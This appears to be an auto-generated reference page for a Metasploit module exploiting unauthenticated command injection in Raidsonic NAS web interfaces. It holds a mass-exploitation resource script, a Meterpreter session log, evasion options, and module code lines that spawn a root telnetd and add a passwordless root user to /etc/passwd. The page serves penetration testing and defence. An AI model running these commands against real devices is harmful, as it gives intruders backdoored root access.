Raidsonic NAS Devices Unauthenticated Remote Command Execution - Metasploit


This page contains detailed information about how to use the exploit/linux/http/raidsonic_nas_ib5220_exec_noauth metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Raidsonic NAS Devices Unauthenticated Remote Command Execution
Module: exploit/linux/http/raidsonic_nas_ib5220_exec_noauth
Source code: modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb
Disclosure date: 2013-02-04
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

Different Raidsonic NAS devices are vulnerable to OS command injection via the web interface. The vulnerability exists in timeHandler.cgi, which is accessible without authentication. This module has been tested with the versions IB-NAS5220 and IB-NAS4220. Since this module is adding a new user and modifying the inetd daemon configuration, this module is set to ManualRanking and could cause target instability.

Module Ranking and Traits


Module Ranking:

  • manual: The exploit is unstable or difficult to exploit and is basically a DoS. This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/windows/smb/psexec). More information about ranking can be found here.

Basic Usage


Using raidsonic_nas_ib5220_exec_noauth against a single host

Normally, you can use exploit/linux/http/raidsonic_nas_ib5220_exec_noauth this way:

msf > use exploit/linux/http/raidsonic_nas_ib5220_exec_noauth
msf exploit(raidsonic_nas_ib5220_exec_noauth) > show targets
    ... a list of targets ...
msf exploit(raidsonic_nas_ib5220_exec_noauth) > set TARGET target-id
msf exploit(raidsonic_nas_ib5220_exec_noauth) > show options
    ... show and set options ...
msf exploit(raidsonic_nas_ib5220_exec_noauth) > exploit

Using raidsonic_nas_ib5220_exec_noauth against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your raidsonic_nas_ib5220_exec_noauth will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/raidsonic_nas_ib5220_exec_noauth")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the linux/http/raidsonic_nas_ib5220_exec_noauth exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/raidsonic_nas_ib5220_exec_noauth

[*] Using configured payload cmd/unix/interact
msf6 exploit(linux/http/raidsonic_nas_ib5220_exec_noauth) > show info

       Name: Raidsonic NAS Devices Unauthenticated Remote Command Execution
     Module: exploit/linux/http/raidsonic_nas_ib5220_exec_noauth
   Platform: Unix
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Manual
  Disclosed: 2013-02-04

Provided by:
  Michael Messner <[email protected]>
  juan vazquez <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    80               yes       The target port (TCP)
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:

Description:
  Different Raidsonic NAS devices are vulnerable to OS command 
  injection via the web interface. The vulnerability exists in 
  timeHandler.cgi, which is accessible without authentication. This 
  module has been tested with the versions IB-NAS5220 and IB-NAS4220. 
  Since this module is adding a new user and modifying the inetd 
  daemon configuration, this module is set to ManualRanking and could 
  cause target instability.

References:
  OSVDB (90221)
  https://www.exploit-db.com/exploits/24499
  http://www.securityfocus.com/bid/57958
  http://www.s3cur1ty.de/m1adv2013-010

Module Options


This is a complete list of options available in the linux/http/raidsonic_nas_ib5220_exec_noauth exploit:

msf6 exploit(linux/http/raidsonic_nas_ib5220_exec_noauth) > show options

Module options (exploit/linux/http/raidsonic_nas_ib5220_exec_noauth):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the linux/http/raidsonic_nas_ib5220_exec_noauth exploit:

msf6 exploit(linux/http/raidsonic_nas_ib5220_exec_noauth) > show advanced

Module advanced options (exploit/linux/http/raidsonic_nas_ib5220_exec_noauth):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   TelnetBannerTimeout     25                                                  yes       The number of seconds to wait for the initial banner
   TelnetTimeout           10                                                  yes       The number of seconds to wait for a reply from a Telnet command
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/interact):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/raidsonic_nas_ib5220_exec_noauth module can exploit:

msf6 exploit(linux/http/raidsonic_nas_ib5220_exec_noauth) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/raidsonic_nas_ib5220_exec_noauth exploit:

msf6 exploit(linux/http/raidsonic_nas_ib5220_exec_noauth) > show payloads

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/raidsonic_nas_ib5220_exec_noauth exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/raidsonic_nas_ib5220_exec_noauth) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<RHOST>:<RPORT> - Unable to execute payload


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Unable to execute payload" error message:

78:	    print_status("#{rhost}:#{rport} - sending first request - killing inetd")
79:	
80:	    res = request(cmd)
81:	    #no server header or something that we could use to get sure the command is executed
82:	    if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
83:	      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
84:	    end
85:	
86:	    #second request
87:	    inetd_cfg = rand_text_alpha(8)
88:	    cmd = "echo \"#{telnet_port} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}"

<RHOST>:<RPORT> - Unable to execute payload


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Unable to execute payload" error message:

90:	    print_status("#{rhost}:#{rport} - sending second request - configure inetd")
91:	
92:	    res = request(cmd)
93:	    #no server header or something that we could use to get sure the command is executed
94:	    if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
95:	      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
96:	    end
97:	    register_file_for_cleanup("/tmp/#{inetd_cfg}")
98:	
99:	    #third request
100:	    cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}"

<RHOST>:<RPORT> - Unable to execute payload


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Unable to execute payload" error message:

102:	    print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd")
103:	
104:	    res = request(cmd)
105:	    #no server header or something that we could use to get sure the command is executed
106:	    if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
107:	      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
108:	    end
109:	
110:	    #fourth request
111:	    @user = rand_text_alpha(6)
112:	    cmd = "echo \"#{@user}::0:0:/:/bin/ash\" >> /etc/passwd"

<RHOST>:<RPORT> - Unable to execute payload


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Unable to execute payload" error message:

114:	    print_status("#{rhost}:#{rport} - sending fourth request - configure user #{@user}")
115:	
116:	    res = request(cmd)
117:	    #no server header or something that we could use to get sure the command is executed
118:	    if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
119:	      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
120:	    end
121:	
122:	    print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
123:	    ctx = { 'Msf' => framework, 'MsfExploit' => self }
124:	    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i, 'Context' => ctx })

<RHOST>:<RPORT> - Backdoor service has not been spawned!!!


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Backdoor service has not been spawned!!!" error message:

122:	    print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
123:	    ctx = { 'Msf' => framework, 'MsfExploit' => self }
124:	    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i, 'Context' => ctx })
125:	
126:	    if sock.nil?
127:	      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
128:	    end
129:	
130:	    add_socket(sock)
131:	
132:	    print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")

<RHOST>:<RPORT> - Unable to establish a telnet session


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Unable to establish a telnet session" error message:

131:	
132:	    print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
133:	    prompt = negotiate_telnet(sock)
134:	    if prompt.nil?
135:	      sock.close
136:	      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
137:	    else
138:	      print_good("#{rhost}:#{rport} - Telnet session successfully established...")
139:	    end
140:	
141:	    handler(sock)

<RHOST>:<RPORT> - Could not connect to the webservice


Here is a relevant code snippet related to the "<RHOST>:<RPORT> - Could not connect to the webservice" error message:

168:	          "renew"        => "0"
169:	          }
170:	        })
171:	      return res
172:	    rescue ::Rex::ConnectionError
173:	      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
174:	    end
175:	  end
176:	
177:	  def negotiate_telnet(sock)
178:	    login = read_telnet(sock, "login: $")

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Michael Messner <devnull[at]s3cur1ty.de>
  • juan vazquez

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.